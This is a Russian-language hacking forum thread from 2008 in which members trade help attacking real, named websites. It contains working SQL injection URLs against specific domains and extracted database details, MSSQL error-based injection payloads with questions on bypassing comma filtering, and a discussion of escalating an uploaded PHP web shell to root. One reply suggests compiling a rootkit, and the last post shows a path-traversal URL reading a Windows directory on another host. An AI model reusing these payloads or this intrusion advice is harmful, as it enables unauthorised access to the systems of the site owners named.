ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.07.2008, 06:00
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме: 2375039
Репутация:
1160
|
|
http://www.svetlana-russkaya.ru/index.php?pid=-101+union+select+1,2,3,4,5,6,7/*
Колонки подобраны не правильно,скоре всего
http://www.svetlana-russkaya.ru/index.php?pid=7&forf_tid=46+order+by+9/*&forf_page_num=1
помогите аскрутить плиз...
|
|
|

14.07.2008, 06:54
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме: 254802
Репутация:
52
|
|
Да просто версия Мускуля - 3-я, у нее нет UNION'a:
http://www.svetlana-russkaya.ru/index.php?pid=101+and+substring(version(),1,1)=3
---
Боюсь в третьей версии ничего сделать не выйдет( слишком много ограничений...
|
|
|

14.07.2008, 09:33
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме: 305110
Репутация:
133
|
|
хм и почему же ты так решил ? )
http://www.svetlana-russkaya.ru/index.php?pid=101
user=svetlana@localhost
database=svetlana
version=3.23.58
попробуй найти установочную директорию скрипта может если права на юзера криво выставленны удастся прочитать файлы
Последний раз редактировалось MaSTeR GэN; 14.07.2008 в 09:35..
|
|
|

14.07.2008, 10:14
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме: 79756
Репутация:
1
|
|
Фильтрация запятых
Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nva rchar)+from+sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarch ar,id)+from+sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!
Последний раз редактировалось NamahS; 14.07.2008 в 10:30..
Причина: Корректировал
|
|
|

14.07.2008, 13:43
|
|
Новичок
Регистрация: 08.07.2008
Сообщений: 2
Провел на форуме: 14347
Репутация:
0
|
|
Помогите, пожалуйста, разобраться с правами шелла.
Суть проблемы:
Залил PHPшелл на сайт - права user/user.
Некий рутовский процесс скопировал этот сайт в директорию не доступную из web, но доступную из шелла. Соответсвенно скопировал и мой шелл. Поскольку при копировании файлу присваиваются права копирующего, то в этой директории шелл приобрел права root/wheel и доступен на чтение.
Я создал в директории доступной из web символическую(мягкую) ссылку на каталог(не на файл) в котором находится рутовский шелл и зашел на него через браузер.
В итоге файл-шелл имеет Permission root/wheel, но работает он почему-то на тех же правах user/user.
Нифига не пойму. Почему он НЕ работает на правах root?
Спасибо.
|
|
|

14.07.2008, 16:23
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Сообщение от Xster
Нифига не пойму. Почему он НЕ работает на правах root?
Спасибо.
Потому что в данном случае пхп запускается с правами апача, а не с правами владельца скрипта.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 14.07.2008 в 23:56..
|
|
|

14.07.2008, 17:38
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме: 79756
Репутация:
1
|
|
Пожалуйста ответьте на #2634
|
|
|

14.07.2008, 18:54
|
|
Новичок
Регистрация: 08.07.2008
Сообщений: 2
Провел на форуме: 14347
Репутация:
0
|
|
Сообщение от Qwazar
Потому что в данном случае пхп запускается с правами апача, а с теми правами владельца скрипта.
Пять раз прочел и не совсем понял, скорее всего ты пропустил частицу "не" перед "с правами апача".
Если так, то ведь владелец скрипта как раз root/wheel. А может ты пропустил частицу "не" перед "с теми правами владельца..."
Тогда нужен шелл на перл или другом языке? на каком? или может скомпилировать программу которая запустится как процесс и выполнит то что мне надо на правах root?
Последний раз редактировалось Xster; 14.07.2008 в 19:00..
|
|
|

14.07.2008, 19:50
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме: 453576
Репутация:
100
|
|
Сообщение от Xster
Пять раз прочел и не совсем понял, скорее всего ты пропустил частицу "не" перед "с правами апача".
Если так, то ведь владелец скрипта как раз root/wheel. А может ты пропустил частицу "не" перед "с теми правами владельца..."
Тогда нужен шелл на перл или другом языке? на каком? или может скомпилировать программу которая запустится как процесс и выполнит то что мне надо на правах root?
Сообщение от Qwazar
Потому что в данном случае пхп запускается с правами апача, а НЕ с теми правами владельца скрипта.
Взял на себя смелость поправить...)
Насчёт шелла на перле идея хорошая, только скомпилить прогу с рутовскими правами будет трудно. Как вариант можно попробовать добавить пользователя, а потом от его имени что-то компилить, например руткит...
|
|
|

14.07.2008, 22:35
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме: 2375039
Репутация:
1160
|
|
могу просматривать весь комп:
http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows
Что это,PHP-injection?
Или просто ошибка горе-кодера в ограничении?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|